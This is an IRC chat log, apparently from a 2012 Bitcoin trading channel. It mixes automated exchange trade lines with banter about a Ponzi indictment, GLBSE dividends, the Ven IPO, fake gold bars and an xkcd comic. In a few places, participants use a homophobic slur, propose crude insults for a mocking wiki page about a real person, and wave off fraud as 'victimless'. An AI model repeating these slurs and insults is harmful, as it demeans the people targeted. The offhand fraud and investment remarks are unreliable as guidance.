underwear Sep 20 03:46:47 Pssh Sep 20 03:46:55 That was victimless white collar crime Sep 20 03:46:56 "caught with his pants down" Sep 20 03:47:14 The BFL guy did nothing wrong but insult the government's sensibilities Sep 20 03:47:23 I would do business with him Sep 20 03:47:42 Just like I would do business with Walter White Sep 20 03:47:45 Bane_Capital did you read the indictment ? Sep 20 03:48:00 I haven't but I heard it involved offshore gambling. Sep 20 03:48:04 the allegation there was simple ponzi. no betting was taking place Sep 20 03:48:10 they simply moved money around to pay fake winners. Sep 20 03:48:15 Oooo Sep 20 03:48:17 mno. it involved fraud. Sep 20 03:48:24 Now that's a bit different Sep 20 03:48:31 I'll read it for sure then. Sep 20 03:49:00 I like the guys hair, that Aarmandi guy. Sep 20 03:49:12 I hope to get mine that long. Sep 20 03:49:21 fag. Sep 20 03:50:04 lol Sep 20 03:51:04 I wonder why he decided to give THAT as a picture to Nefario =/ Sep 20 03:51:36 He doesn't really care it seems. Sep 20 03:52:48 [GLBSE] [FPGAMINING] 3 @ 0.63999999 = 1.92 BTC [-] Sep 20 03:53:53 [GLBSE] [OBSI.HRPT] 1 @ 0.099 BTC [-] Sep 20 03:54:01 Indeed Sep 20 03:54:53 https://bitcointalk.org/index.php?topic=110709.0 Sep 20 03:54:58 Am I missing the joke here? Sep 20 03:55:39 you are the joke! Sep 20 03:55:46 reeses wanna be the mod ? Sep 20 03:56:09 http://www.mcwhortle.com/onlinebid.htm Sep 20 03:56:11 lol Sep 20 03:56:19 http://www.sec.gov/news/headlines/scamsites.htm Sep 20 03:57:09 [GLBSE] [ASICMINER] 3 @ 0.1132 = 0.3396 BTC [+] Sep 20 03:57:38 [GLBSE] [GMVT-BOT] 1 @ 0.12 BTC [-] Sep 20 03:57:39 mircea_popescu: you want someone else to kick out Bane_Capital? Sep 20 03:57:51 ? Sep 20 03:57:59 I've been here forever. Sep 20 03:58:04 You can't kick me out. Sep 20 03:58:09 reeses i mischanned. Sep 20 03:58:16 atlas Sep 20 03:58:26 dun dun dun Sep 20 03:59:30 copumpkin: lol, regulators are doing an MNW! Sep 20 03:59:31 Bane_Capital: ban is such an ugly word to use between people who don’t give a shit who the other person is. Sep 20 04:01:48 ban is actually the romanian word for money. Sep 20 04:04:16 hey Bane_Capital, when you don't know the answer to a question, do you do this: http://noagendaforums.com/forums/MGalleryItem.php?id=212 Sep 20 04:05:03 [MPEX] [S.MPOE] 31694 @ 0.0004099 = 12.9914 BTC [-] Sep 20 04:05:04 smickles: Link doesn't work. Sep 20 04:05:04 [MPEX] [S.MPOE] 3609 @ 0.00041296 = 1.4904 BTC [+] Sep 20 04:06:34 damn, Bane_Capital try the link in thispost then http://forum.objectivismonline.com/index.php?showtopic=19991 Sep 20 04:06:54 or actually, download it Sep 20 04:07:10 'cause it's anaudo file Sep 20 04:07:42 lol Sep 20 04:07:57 I shrug because the concept of shame is usually lost on me. Sep 20 04:08:58 <__Atlas__> When I do feel shame, it's because I feel I talk too much. Sep 20 04:10:44 never!? Sep 20 04:13:13 <__Atlas__> Quite often actually. Sep 20 04:13:23 <__Atlas__> I am just vocal naturally it seems. Sep 20 04:13:50 <__Atlas__> That's a good premise to have in your mind but social instincts say otherwise. Sep 20 04:14:00 <__Atlas__> Shame is actual pain. Sep 20 04:14:03 <__Atlas__> Same receptors. Sep 20 04:14:33 <__Atlas__> Came along when our weasel ancestors started being more frisky. Sep 20 04:15:09 <__Atlas__> I admire that. Sep 20 04:15:36 <__Atlas__> I think the shame goes down as you get older Sep 20 04:15:45 <__Atlas__> The hormone die down. Sep 20 04:15:50 <__Atlas__> hormones* Sep 20 04:15:55 wat Sep 20 04:17:44 <__Atlas__> Yeah, my shame usually comes from violating my values. It seems I care far too much of the happiness of other people in regards to me and otherwise. Sep 20 04:20:40 <__Atlas__> Well deserve is a strong word. Sep 20 04:20:52 <__Atlas__> It implies a bond, an obligation to something higher than yourself. Sep 20 04:20:55 [GLBSE] [OBSI.HRPT] 1 @ 0.09862002 BTC [-] Sep 20 04:20:56 [GLBSE] [OBSI.HRPT] 11 @ 0.09850003 = 1.0835 BTC [-] Sep 20 04:21:29 <__Atlas__> Hm Sep 20 04:22:21 [GLBSE] [OBSI.HRPT] 10 @ 0.09850003 = 0.985 BTC [-] Sep 20 04:22:23 [GLBSE] [OBSI.HRPT] 5 @ 0.09850002 = 0.4925 BTC [-] Sep 20 04:22:25 <__Atlas__> Heh, I like that you call the thought of anything higher than yourself as religion. Sep 20 04:22:36 <__Atlas__> Because certainly the idea of a greater good is. Sep 20 04:23:40 <__Atlas__> It's a shame really because it extends to a lot of ideology as well. Sep 20 04:24:03 no OBSI.HRPT dividend yet today? Sep 20 04:24:31 nope, none Sep 20 04:25:49 <__Atlas__> Smoovious, that's really my point. Good can only be defined by the individual agents that perceive it. Sep 20 04:26:07 <__Atlas__> It is up to their will in the end as to what is good or not. Sep 20 04:26:34 <__Atlas__> To go beyond that Sep 20 04:26:38 <__Atlas__> Is truly religious. Sep 20 04:27:06 <__Atlas__> Whether said good be defined by god, a purported nature or science. Sep 20 04:27:48 mircea_popescu, what percentage of dice is on glbse Sep 20 04:28:18 mmm, like 500k ish shares i think ? Sep 20 04:28:19 .5% Sep 20 04:28:34 0.5% = Sep 20 04:28:42 0.5%?? Sep 20 04:29:20 well what ? Sep 20 04:29:36 it paid 7.5k in dividends, glbse showed ~30somthing, neh ? .5% Sep 20 04:29:50 <__Atlas__> Smoovious: At times that is the core of it, they don't want to face life alone. They are scared. Sep 20 04:30:11 hm Sep 20 04:30:17 thats poor. Sep 20 04:30:32 why do so many people have ads in thier sigs? Sep 20 04:30:41 do coinablu and BFL pay people to do it? Sep 20 04:30:45 for BFL? Sep 20 04:30:45 ya Sep 20 04:30:47 counabul* Sep 20 04:30:48 bfl pays lol Sep 20 04:30:58 gotta buy peoples opinions Sep 20 04:31:03 [MPEX] [F.GIGA.ETF] 1400 @ 0.00027502 = 0.385 BTC [-] Sep 20 04:31:03 [MPEX] [F.GIGA.ETF] 1339 @ 0.00027164 = 0.3637 BTC [-] Sep 20 04:31:20 lots of people have poems about coinabul too Sep 20 04:31:21 mircea: it paid 750 to like 3 million shares on 100 million Sep 20 04:31:22 <__Atlas__> I wonder if BFL would pay for my signature space. Everybody gets butthurt if I say one word. Sep 20 04:31:44 <__Atlas__> Me: No, I don't agree. Sep 20 04:31:56 <__Atlas__> Somebody: TROLL. GO BACK TO MASTURBATING ON 4chan! Sep 20 04:31:58 BTC-Mining it paid 750 to 10mn. Sep 20 04:32:10 Ah Sep 20 04:32:31 So not outstanding shares still count. Sep 20 04:32:46 how much do they pay? Sep 20 04:32:48 On GLBSE, until shares are sold, they aren't counted for giving dividends Sep 20 04:32:56 hm, ~7 mio shares left? Sep 20 04:33:03 1/3 sold Sep 20 04:33:14 So issuer has to calculate how much the outstanding shares need to get and pay that only Sep 20 04:33:49 ya something like that. Sep 20 04:34:04 BTC-Mining nah. issued shares (10mn in this case) is all that matters. Sep 20 04:36:03 [GLBSE] [GIGAMINING] 2 @ 0.67 = 1.34 BTC [+] Sep 20 04:44:49 [GLBSE] [GIGAMINING] 1 @ 0.63510002 BTC [-] Sep 20 04:44:50 [GLBSE] [GIGAMINING] 2 @ 0.63510001 = 1.2702 BTC [-] Sep 20 04:44:52 [GLBSE] [GIGAMINING] 2 @ 0.6351 = 1.2702 BTC [-] Sep 20 04:45:48 [GLBSE] [GIGAMINING] 2 @ 0.63510001 = 1.2702 BTC [+] Sep 20 04:45:49 [GLBSE] [GIGAMINING] 5 @ 0.6351 = 3.1755 BTC [-] Sep 20 04:45:50 [GLBSE] [GIGAMINING] 3 @ 0.635 = 1.905 BTC [-] Sep 20 04:47:10 [GLBSE] [YABMC] 7 @ 0.077 = 0.539 BTC [-] Sep 20 04:47:11 [GLBSE] [YABMC] 4 @ 0.0787 = 0.3148 BTC [+] Sep 20 04:48:48 [GLBSE] [ASICMINER] 3 @ 0.1198989 = 0.3597 BTC [+] Sep 20 04:48:49 [GLBSE] [ASICMINER] 2 @ 0.119899 = 0.2398 BTC [+] Sep 20 04:58:10 [GLBSE] [YABMC] 13 @ 0.0787 = 1.0231 BTC [+] Sep 20 04:59:19 [GLBSE] [OBSI.HRPT] 8 @ 0.09600001 = 0.768 BTC [-] Sep 20 05:02:03 [MPEX] [S.MPOE] 4469 @ 0.00040801 = 1.8234 BTC [-] Sep 20 05:02:05 [MPEX] [S.MPOE] 35938 @ 0.00040695 = 14.625 BTC [-] Sep 20 05:02:56 [GLBSE] [OBSI.1MHS] 2 @ 0.0925 = 0.185 BTC [-] Sep 20 05:02:58 [GLBSE] [OBSI.1MHS] 2 @ 0.0925 = 0.185 BTC [-] Sep 20 05:09:58 [GLBSE] [OBSI.HRPT] 10 @ 0.09050001 = 0.905 BTC [-] Sep 20 05:10:00 [GLBSE] [NASTY] 3 @ 0.51 = 1.53 BTC [-] Sep 20 05:10:16 [GLBSE] [OBSI.HRPT] 30 @ 0.0905 = 2.715 BTC [-] Sep 20 05:10:23 [GLBSE] [OBSI.HRPT] 44 @ 0.09040001 = 3.9776 BTC [-] Sep 20 05:10:25 [GLBSE] [OBSI.HRPT] 13 @ 0.0904 = 1.1752 BTC [-] Sep 20 05:11:00 [GLBSE] [OBSI.HRPT] 5 @ 0.09040001 = 0.452 BTC [+] Sep 20 05:11:38 [GLBSE] [BLUECHIP] 14 @ 0.1 = 1.4 BTC [+] Sep 20 05:11:52 [GLBSE] [FPGAMINING] 1 @ 0.47000001 BTC [-] Sep 20 05:11:54 [GLBSE] [FPGAMINING] 10 @ 0.47 = 4.7 BTC [-] Sep 20 05:11:55 [GLBSE] [FPGAMINING] 5 @ 0.45001 = 2.2501 BTC [-] Sep 20 05:11:56 [GLBSE] [FPGAMINING] 2 @ 0.450001 = 0.9 BTC [-] Sep 20 05:11:58 [GLBSE] [FPGAMINING] 10 @ 0.45 = 4.5 BTC [-] Sep 20 05:11:59 [GLBSE] [FPGAMINING] 1 @ 0.4400004 BTC [-] Sep 20 05:12:00 [GLBSE] [FPGAMINING] 3 @ 0.44 = 1.32 BTC [-] Sep 20 05:12:01 [GLBSE] [FPGAMINING] 2 @ 0.422 = 0.844 BTC [-] Sep 20 05:12:01 [GLBSE] [FPGAMINING] 9 @ 0.41110002 = 3.6999 BTC [-] Sep 20 05:12:02 [GLBSE] [FPGAMINING] 9 @ 0.411 = 3.699 BTC [-] Sep 20 05:12:04 [GLBSE] [FPGAMINING] 38 @ 0.41 = 15.58 BTC [-] Sep 20 05:12:42 [GLBSE] [BITCOINMINV] 2 @ 0.1249899 = 0.25 BTC [-] Sep 20 05:12:44 [GLBSE] [BITCOINMINV] 5 @ 0.12499 = 0.625 BTC [+] Sep 20 05:12:45 [GLBSE] [BITCOINMINV] 7 @ 0.125 = 0.875 BTC [+] Sep 20 05:14:23 [GLBSE] [NYAN.A] 28 @ 1 = 28 BTC [+] Sep 20 05:15:05 [GLBSE] [KRAKEN] 93 @ 0.00999996 = 0.93 BTC [+] Sep 20 05:16:58 Good ole Krakenfund. I strongly advise for BTC-BOND instead however. Sep 20 05:18:24 why? Sep 20 05:23:47 [GLBSE] [OBSI.1MHS] 5 @ 0.085 = 0.425 BTC [-] Sep 20 05:24:52 Because Kraken does not pay much? And even if Patrick backs it, it's still mostly Pirate Sep 20 05:25:48 [MPEX] [B.MPCD.A] 40000 @ 0.00101438 = 40.5752 BTC [+] Sep 20 05:26:51 [GLBSE] [PUREMINING] 3 @ 0.09599 = 0.288 BTC [+] Sep 20 05:26:53 [GLBSE] [PUREMINING] 10 @ 0.09599 = 0.9599 BTC [+] Sep 20 05:26:54 [GLBSE] [PUREMINING] 4 @ 0.095995 = 0.384 BTC [+] Sep 20 05:26:56 [GLBSE] [PUREMINING] 8 @ 0.0959995 = 0.768 BTC [+] Sep 20 05:26:57 [GLBSE] [PUREMINING] 5 @ 0.096 = 0.48 BTC [+] Sep 20 05:26:57 [GLBSE] [PUREMINING] 2 @ 0.0969 = 0.1938 BTC [+] Sep 20 05:26:58 [GLBSE] [PUREMINING] 8 @ 0.097 = 0.776 BTC [+] Sep 20 05:28:00 good god Sep 20 05:28:08 BTC-Mining: check out the IPO page Sep 20 05:28:31 [GLBSE] [PUREMINING] 1 @ 0.097 BTC [+] Sep 20 05:28:47 To everyone PMing me: HRPT coupons go out between 8 PM & 6 AM UTC. Read the first post in the thread >:-| Sep 20 05:28:59 I do have places to be sometimes. Sep 20 05:29:45 [GLBSE] [OBSI.HRPT] 1 @ 0.10199999 BTC [+] Sep 20 05:30:51 [GLBSE] [OBSI.HRPT] 7 @ 0.10199999 = 0.714 BTC [+] Sep 20 05:32:01 scammer Sep 20 05:32:41 [GLBSE] [OBSI.HRPT] 45 @ 0.10199999 = 4.59 BTC [+] Sep 20 05:33:23 [GLBSE] [OBSI.HRPT] 1 @ 0.10199999 BTC [+] Sep 20 05:33:42 Yes, honest people stay stuck on their screen Sep 20 05:34:11 then I must be the most honest person in here Sep 20 05:34:39 BTC-Mining: did you have a look at VEN? Sep 20 05:34:50 VEN? Sep 20 05:35:26 https://glbse.com/ipo/220 Sep 20 05:37:47 Looks like a scammy asset. There's just a description of the actual currency. Sep 20 05:38:19 [GLBSE] [JTME] 3 @ 0.875 = 2.625 BTC [+] Sep 20 05:38:30 What's the contract on it? Sep 20 05:39:07 eh GLBSE is issuing it Sep 20 05:39:22 it's not a scam, I went to their premesis in London today to verify them Sep 20 05:39:38 Ah Sep 20 05:39:50 it's a fairly large real world business Sep 20 05:39:57 [GLBSE] [OBSI.HRPT] 10 @ 0.10199999 = 1.02 BTC [+] Sep 20 05:40:04 will be listing some of their funds in the next few days or week Sep 20 05:40:08 gold fund included Sep 20 05:40:15 Wait, so it's an actual IPO from VEN??? I'm puzzled, why would they do that on GLBSE? Sep 20 05:40:27 I mean, why would they need to? Sep 20 05:40:32 [GLBSE] [OBSI.HRPT] 10 @ 0.10000001 = 1 BTC [-] Sep 20 05:40:34 [GLBSE] [OBSI.HRPT] 270 @ 0.1 = 27 BTC [-] Sep 20 05:40:36 [GLBSE] [OBSI.HRPT] 425 @ 0.0905 = 38.4625 BTC [-] Sep 20 05:40:40 To accept bitcoin Sep 20 05:40:50 and have a floating marketplace for Ven itself Sep 20 05:41:04 Ah... so are shares redeemable or something? Sep 20 05:41:09 yes Sep 20 05:41:22 not just for trading on GLBSE Sep 20 05:41:35 Ah, quite interesting. And I thought it was some impersonator trying to issue. Sep 20 05:41:36 you can buy orange juice at a cafe using this Sep 20 05:41:43 ok it's the cafe in their pavillion Sep 20 05:41:48 but you get the idea Sep 20 05:41:50 Yes, I've read about it before. Sep 20 05:41:52 lol Sep 20 05:42:02 good instincts Sep 20 05:42:11 It was mentioned somewhere around the bitcoin world and I went to read about it. Sep 20 05:42:17 yeah Sep 20 05:42:23 he spoke at bitcoin2012 Sep 20 05:42:27 which is where I met him Sep 20 05:42:34 Then proceeded to forget about it because I'm too focused on Bitcoins Sep 20 05:42:48 lol Sep 20 05:43:17 I think it's going to be a really handy way for people with bitcoin to move in and out of things like ven Sep 20 05:43:26 which isn't exactly linked to USD or fiat Sep 20 05:43:31 but doesn't move much against it Sep 20 05:43:43 can also allow the purchasing of gold backed assets Sep 20 05:43:55 I mean real ones, not scammy ones Sep 20 05:44:04 Tungsten filled? Sep 20 05:44:16 eh? Sep 20 05:44:28 They found one in NY apparently Sep 20 05:44:36 filled with tungsten Sep 20 05:44:40 a gold bar Sep 20 05:45:08 Reputable gold seller, had gold bars filled with tungsten Sep 20 05:45:24 ouch Sep 20 05:45:59 The seller announced it himself tho, he was not scamming people, just discovered them. And the source was safe too probably. Sep 20 05:46:39 Made from reputable swiss... arf I don't know how you call those but yeah. With serial numbers and papers. Sep 20 05:46:54 People just hollows them, fill them with tungsten, resell them. Sep 20 05:47:04 I wonder how long they had been trading at full amount Sep 20 05:47:20 Me too... and they might be more common than one might think. Sep 20 05:47:21 We should sell LTC filled BTC Sep 20 05:47:58 http://www.zerohedge.com/news/tungsten-filled-10-oz-gold-bar-found-middle-manhattans-jewelry-district Sep 20 05:48:30 See the video with the gold seller "opening" one of his bar Sep 20 05:48:32 perhaps it was counterfeited then bought, without the shop's knowledge? Sep 20 05:49:42 Yes, the shop itself announced it and showed the news Sep 20 05:50:09 And the place they bought it was probably also innocent, they might have been circulating for a long time. Sep 20 05:50:31 hmm Sep 20 05:50:45 they only noticed when they tried to melt it for jewelry Sep 20 05:51:03 [MPEX] [S.MPOE] 17800 @ 0.00040816 = 7.2652 BTC [+] Sep 20 05:51:31 Indeed Sep 20 05:51:55 well that seems pretty fucking shitty Sep 20 05:52:48 it was bound to become more popular after the article in wired a while back Sep 20 05:56:39 lol forums Sep 20 05:56:53 "butterfly labs has to be mining asics already" Sep 20 05:57:12 "BFL asics are a scam, vaporware!" Sep 20 05:58:59 The forum are full of extremist nutcases. They pass stories as fact instead of opinions/suspicions. Sep 20 05:59:05 "my friends are not scammers, the just don't want to sign anything that makes them responsible for what they said they would be responsible for" Sep 20 05:59:34 sounds familiar Sep 20 05:59:45 or in more fancy words Sep 20 05:59:49 so much asshattery I know Sep 20 06:00:00 "I prefer a gentlemans agreement, with a wink and a handshake" Sep 20 06:00:09 ;-) Sep 20 06:00:24 You know you like it when I wink at you Sep 20 06:01:14 lol Sep 20 06:02:22 Obsi: that was you who wrote that right? Sep 20 06:02:23 lol Sep 20 06:02:43 Pretty sure it was something close to that Sep 20 06:02:49 smile and a handshake maybe Sep 20 06:03:50 that was it Sep 20 06:04:05 [GLBSE] [SS] 1 @ 0.01240001 BTC [-] Sep 20 06:04:06 [GLBSE] [SS] 29 @ 0.0124 = 0.3596 BTC [-] Sep 20 06:05:02 [GLBSE] [SS] 6 @ 0.0124 = 0.0744 BTC [-] Sep 20 06:05:04 [GLBSE] [SS] 20 @ 0.012345 = 0.2469 BTC [-] Sep 20 06:05:05 [GLBSE] [SS] 30 @ 0.012 = 0.36 BTC [-] Sep 20 06:05:06 [GLBSE] [SS] 10 @ 0.012 = 0.12 BTC [-] Sep 20 06:05:07 [GLBSE] [SS] 1 @ 0.01 BTC [-] Sep 20 06:05:14 [GLBSE] [SS] 31 @ 0.01 = 0.31 BTC [-] Sep 20 06:07:49 [GLBSE] [OBSI.HRPT] 2 @ 0.10099999 = 0.202 BTC [+] Sep 20 06:08:09 [GLBSE] [GSDPT] 10 @ 0.0034 = 0.034 BTC [+] Sep 20 06:09:10 [GLBSE] [OBSI.HRPT] 8 @ 0.10099999 = 0.808 BTC [+] Sep 20 06:18:03 Chaang-Noi: http://i.imgur.com/RExQi.png << ALMOST a goat on a boat reference in xkcd :D Sep 20 06:19:26 [MPEX] [F.GIGA.ETF] 6761 @ 0.00027164 = 1.8366 BTC [-] Sep 20 06:19:27 [MPEX] [F.GIGA.ETF] 1039 @ 0.00026389 = 0.2742 BTC [-] Sep 20 06:19:28 [MPEX] [S.MPOE] 11320 @ 0.00041115 = 4.6542 BTC [+] Sep 20 06:19:49 I was referring to that earlier. Sep 20 06:20:00 I said, hey, I think Goat is there Sep 20 06:21:01 that comic is amazing Sep 20 06:21:03 there is a pirate ship chasing it Sep 20 06:21:08 I spent about 10 minutes scrolling down Sep 20 06:21:14 and then ther is bitcoin Oil-Mining-Rig just before that Sep 20 06:21:14 didn't hit the bottom Sep 20 06:21:15 gave up Sep 20 06:21:32 http://i.imgur.com/vtrhY.png << there is the official bitcoin reference Sep 20 06:21:41 then there is the pirateship and the gatship :D Sep 20 06:21:43 funny as Sep 20 06:21:56 *goatship Sep 20 06:23:26 Really, is the guy making those comics hanging around bitcointalk? Sep 20 06:23:28 [GLBSE] [OBSI.HRPT] 1 @ 0.10199999 BTC [+] Sep 20 06:23:56 well he says he only just heard of bitcoins Sep 20 06:24:02 but the bitcoin oil-rig mine Sep 20 06:24:11 a pirateship chasing a "im on a Boat" boat Sep 20 06:24:14 gotta wonder Sep 20 06:24:53 there is just so much drama in bitcoinland Sep 20 06:24:58 should be a tv soap Sep 20 06:26:29 Nefario, too late, I'm already producing one. Sep 20 06:27:57 It's about a bunch of people going with money bills to a booth and buying shiny coins with a large B on them. Then they all stay around the booth and throw coins at each other or guard their little stack looking suspiciously all around. Sep 20 06:28:18 Many people screaming. It's a tribute to mental asylums. Sep 20 06:28:19 [GLBSE] [PUREMINING] 2 @ 0.09450002 = 0.189 BTC [-] Sep 20 06:28:20 [GLBSE] [PUREMINING] 25 @ 0.094 = 2.35 BTC [-] Sep 20 06:29:24 can you make a flash animation of this? Sep 20 06:29:53 Sadly, no. Sep 20 06:30:45 [GLBSE] [BFLS.RIG] 2 @ 0.89 = 1.78 BTC [-] Sep 20 06:30:46 [GLBSE] [BFLS.RIG] 1 @ 0.89 BTC [-] Sep 20 06:30:51 I would say I would pay for that Sep 20 06:30:52 but Sep 20 06:30:59 when you eventually make it Sep 20 06:31:00 I wouldn't Sep 20 06:32:58 http://www.encyclopediabitcoinica.com/wiki/GoatsOnABoat Sep 20 06:33:06 [GLBSE] [BFLS.RIG] 1 @ 0.899 BTC [+] Sep 20 06:33:36 XKCD Pic added ; someone else batter at satire can do the words better, im sure :P Sep 20 06:34:24 Even on the pirate ship, the quote... someone ask someone why they're climbing it, the answer about the whole system being rigged against the middle class ... then the other asking why that person is on THIS boat Sep 20 06:34:25 love the sea of GLBSE backdrop Sep 20 06:35:42 Not to count the bogus excuse made by the person in front of the pirate ship (We should go slow, the water ahead looks pretty deep) Sep 20 06:35:54 Which is the exact opposite of what would be worrying for a ship Sep 20 06:35:55 :D the guy is soo watches TheBitcoinDrama Sep 20 06:36:15 That or my mind got twisted by the bitcoin drama Sep 20 06:36:36 too much popcoin eh ? Sep 20 06:37:18 Even the excessive tunnels often looking like mining shaft. There's a few miners around. Sep 20 06:37:42 [GLBSE] [OBSI.HRPT] 1 @ 0.10199999 BTC [+] Sep 20 06:38:19 Oh yeah xD Sep 20 06:39:19 http://www.encyclopediabitcoinica.com/wiki/ToothlessDragon Sep 20 06:39:20 lol Sep 20 06:39:23 did you mean? Sep 20 06:40:27 http://www.encyclopediabitcoinica.com/wiki/VagFace Sep 20 06:43:54 [GLBSE] [JTME] 1 @ 0.98898 BTC [+] Sep 20 06:46:02 [MPEX] [S.MPOE] 28115 @ 0.00041296 = 11.6104 BTC [+] Sep 20 06:46:04 [MPEX] [S.MPOE] 22243 @ 0.000413 = 9.1864 BTC [+] Sep 20 06:46:26 heheehe thats one of my favourite pics aquired in my time here at bitcoin, nefario :D Sep 20 06:47:08 (the *vagface* one) and... well... i cudnt resist on the tootlessdragon ;) Sep 20 06:48:33 apparently Randalf (the XKCD guy) was actually in -otc yesterday .... Sep 20 06:48:37 He was on #bitcoin-otc yesterday (I was so excited!) He said he took it down because he didn't want to endorse something purely for profit. He is still using bitcoin, though. Sep 20 06:48:37 I think the main point to take away from this is that he considers his bitcoins "profit." Sep 20 06:48:59 Sep 20 06:49:49 http://www.encyclopediabitcoinica.com/wiki/Diablo-D3 Sep 20 06:51:04 AHAHAHAHAHAHA nefario++ Sep 20 06:51:37 yeah I thought so Sep 20 07:00:38 must be a slow day creating the future of bitcoin scams Sep 20 07:00:45 nefario has so much time for irc Sep 20 07:01:34 That does not seem a prudent thing to write about someone even if only thought of as a joke, when you are at odds with each other over business matters. Sep 20 07:01:47 Re: Diablo on that wiki Sep 20 07:04:01 [GLBSE] [JAH] 49 @ 0.1 = 4.9 BTC [-] Sep 20 07:04:09 Obsi: nefario is merely establishing an accurate trust profile Sep 20 07:04:30 "The people mocked on this website, even the real ones, are fictional and any resemblence to anyone living or dead is purely coincidental. Sep 20 07:04:33 The commentary on this website will contain course language and adult concepts and due to its content should not be viewed by anyone" Sep 20 07:04:58 someone write an entry for dub Sep 20 07:05:09 find a way to fit the cuntface Sep 20 07:05:13 into the article Sep 20 07:05:32 would it be too much of a conflict for you nefario? given I'm not a customer Sep 20 07:06:12 nefario: do you offer any method for moving an asset off of your platform? Sep 20 07:06:27 not really Sep 20 07:06:36 unless Sep 20 07:06:39 you're an issuer Sep 20 07:06:50 then I can move the whole thing into a csv Sep 20 07:07:23 with account names or BTC addresses for shareholders? Sep 20 07:08:08 codes Sep 20 07:08:12 think mtgox codes Sep 20 07:08:15 but Sep 20 07:08:20 that is basically delisting Sep 20 07:08:41 and how would one verify a person owns the code? Sep 20 07:08:50 they have it Sep 20 07:08:59 it will be on your csv Sep 20 07:09:07 simples Sep 20 07:09:25 they get it mailed to them or it is somewhere in their account? Sep 20 07:09:38 <__Atlas__> https://bitcointalk.org/index.php?topic=110765.msg1205850#new Sep 20 07:09:44 <__Atlas__> Let's see if this goes anywhere. Sep 20 07:10:36 you're a unitard Sep 20 07:10:59 Any progress on the shirt story __Atlas__? Sep 20 07:11:00 something like that Sep 20 07:11:04 *short Sep 20 07:11:19 <__Atlas__> Obsi: I have half of it done Sep 20 07:11:29 <__Atlas__> I am in a creative rut Sep 20 07:11:40 coolness... PM me when you post it, I sometimes miss updated threads Sep 20 07:12:02 [MPEX] [S.MPOE] 4700 @ 0.000413 = 1.9411 BTC [+] Sep 20 07:15:20 you know, I wonder if nefario really does want to lose glbsse Sep 20 07:18:23 https://bitcointalk.org/index.php?topic=110768.0 Sep 20 07:19:32 they need to fix their certificate on their site Sep 20 07:19:39 the hub.vg one Sep 20 07:19:48 also, their site tells me remarkably little about what it actually is Sep 20 07:19:57 <__Atlas__> nefario: I was waiting for the day you started an asset. Sep 20 07:20:06 lol Sep 20 07:21:35 hub.vg? Sep 20 07:22:28 __Atlas__: I would prefer not to Sep 20 07:22:37 on their front page, they have a "Ven" hyperlink Sep 20 07:22:43 but it seems that it's really difficult for people to put anything stable on Sep 20 07:22:45 right above the "Apply to join" link Sep 20 07:22:55 that links to hub.vg, which has a bad cert Sep 20 07:23:15 it seems to be better now Sep 20 07:23:18 I guess it's just a redirect Sep 20 07:23:38 hub.vg is a url shortener Sep 20 07:23:39 AFAIK Sep 20 07:23:47 went to the place today Sep 20 07:23:53 full of hipsters Sep 20 07:29:31 [GLBSE] [MOVETO.FUND] 4 @ 1.0001 = 4.0004 BTC [-] Sep 20 07:29:33 [GLBSE] [MOVETO.FUND] 5 @ 1 = 5 BTC [-] Sep 20 07:31:53 Deny IPO! Tell the hipsters they have to understand first they are VERY mainstream in their "non-mainstreamism" goals before being allowed to do anything at all anywhere. Sep 20 07:33:25 if you go there Sep 20 07:33:29 you can see they all use macs Sep 20 07:33:35 wear frames Sep 20 07:33:48 and sit on environmentally friendly furniture Sep 20 07:33:59 drinking organic, fair trade coffee Sep 20 07:34:04 do they ride fixed-gear bikes? Sep 20 07:34:16 how the fuck would I know Sep 20 07:34:17 ironically, of course Sep 20 07:34:30 I'm sure they do Sep 20 07:34:46 buy some ven, book some time in the place and ask yourself Sep 20 07:35:19 copumpkin, all that eco-friendly stuff is expensive, cars (or public transit/multi-speed bikes for that matter) are way too expensive. Sep 20 07:35:29 of course they have fixed-gear bikes Sep 20 07:36:06 plus cars are not eco-friendly anyway Sep 20 07:36:18 I don't have a car or even a license Sep 20 07:37:15 Me neither Sep 20 07:37:25 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Sep 20 07:37:28 <__Atlas__> The only way to comply with Agenda 21 is to ride a bike Sep 20 07:38:03 [MPEX] [S.MPOE] 21900 @ 0.00041115 = 9.0042 BTC [-] Sep 20 07:38:12 Being normal is the new hipster. Be different. Be like the mass. Sep 20 07:38:22 *** adjusts hand carved wooden spectacle frames *** Sep 20 07:38:36 oh man Sep 20 07:38:37 I think we have a winner Sep 20 07:38:42 I bet he handcarved those before it was cool, too Sep 20 07:38:44 ...ironically Sep 20 07:38:50 I actually know someone who carves frames Sep 20 07:38:59 although they sell them Sep 20 07:39:04 for like 600$ a pair Sep 20 07:39:15 wow Sep 20 07:39:16 takes him 2 days per pair Sep 20 07:39:20 I know Sep 20 07:39:28 who the fuck is dumb enough to pay that Sep 20 07:39:36 like how easy it would be to break them Sep 20 07:39:44 I'd do that. 300$ a day, seems like a nice art. Sep 20 07:40:02 later girls Sep 20 07:56:28 <__Atlas__> Gigamining Sep 20 07:56:33 <__Atlas__> Why is it still bought? Sep 20 07:56:59 No idea Sep 20 07:57:13 Anyone holding OBSI.1MHS or OBSI.ABMO they want to sell? Sep 20 07:57:16 I'm sad at the price I bought them Sep 20 07:58:01 btw keeps going up :/ Sep 20 07:58:20 i need to get money and buy some first... Sep 20 07:58:46 [GLBSE] [OBSI.HRPT] 2 @ 0.10199999 = 0.204 BTC [+] Sep 20 08:00:18 <__Atlas__> You know, communists need to watch Breaking Bad to see why owning the means of production doesn't mean everything. Sep 20 08:00:26 <__Atlas__> Distribution doesn't appear out of nowhere. Sep 20 08:04:02 [MPEX] [F.GIGA.ETF] 9958 @ 0.00026389 = 2.6278 BTC [-] Sep 20 08:11:36 [GLBSE] [BMF] 2 @ 0.5201 = 1.0402 BTC [+] Sep 20 08:19:36 [GLBSE] [KRAKEN] 5 @ 0.00999996 = 0.05 BTC [+] Sep 20 08:23:41 [GLBSE] [GOLD] 1 @ 0.01 BTC [+] Sep 20 08:23:54 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Sep 20 08:25:10 [GLBSE] [OBSI.1MHS] 700 @ 0.1 = 70 BTC [+] Sep 20 08:31:02 [MPEX] [S.MPOE] 1326 @ 0.00041115 = 0.5452 BTC [-] Sep 20 08:32:41 oh many that btc price :/ Sep 20 08:32:45 man* Sep 20 08:32:47 slow down Sep 20 08:39:24 !ticker Sep 20 08:39:25 Provide ticker. Sep 20 08:39:31 ;;ticker Sep 20 08:39:32 Best bid: 12.5609, Best ask: 12.57779, Bid-ask spread: 0.01689, Last trade: 12.57779, 24 hour volume: 38671, 24 hour low: 12.213, 24 hour high: 12.68666 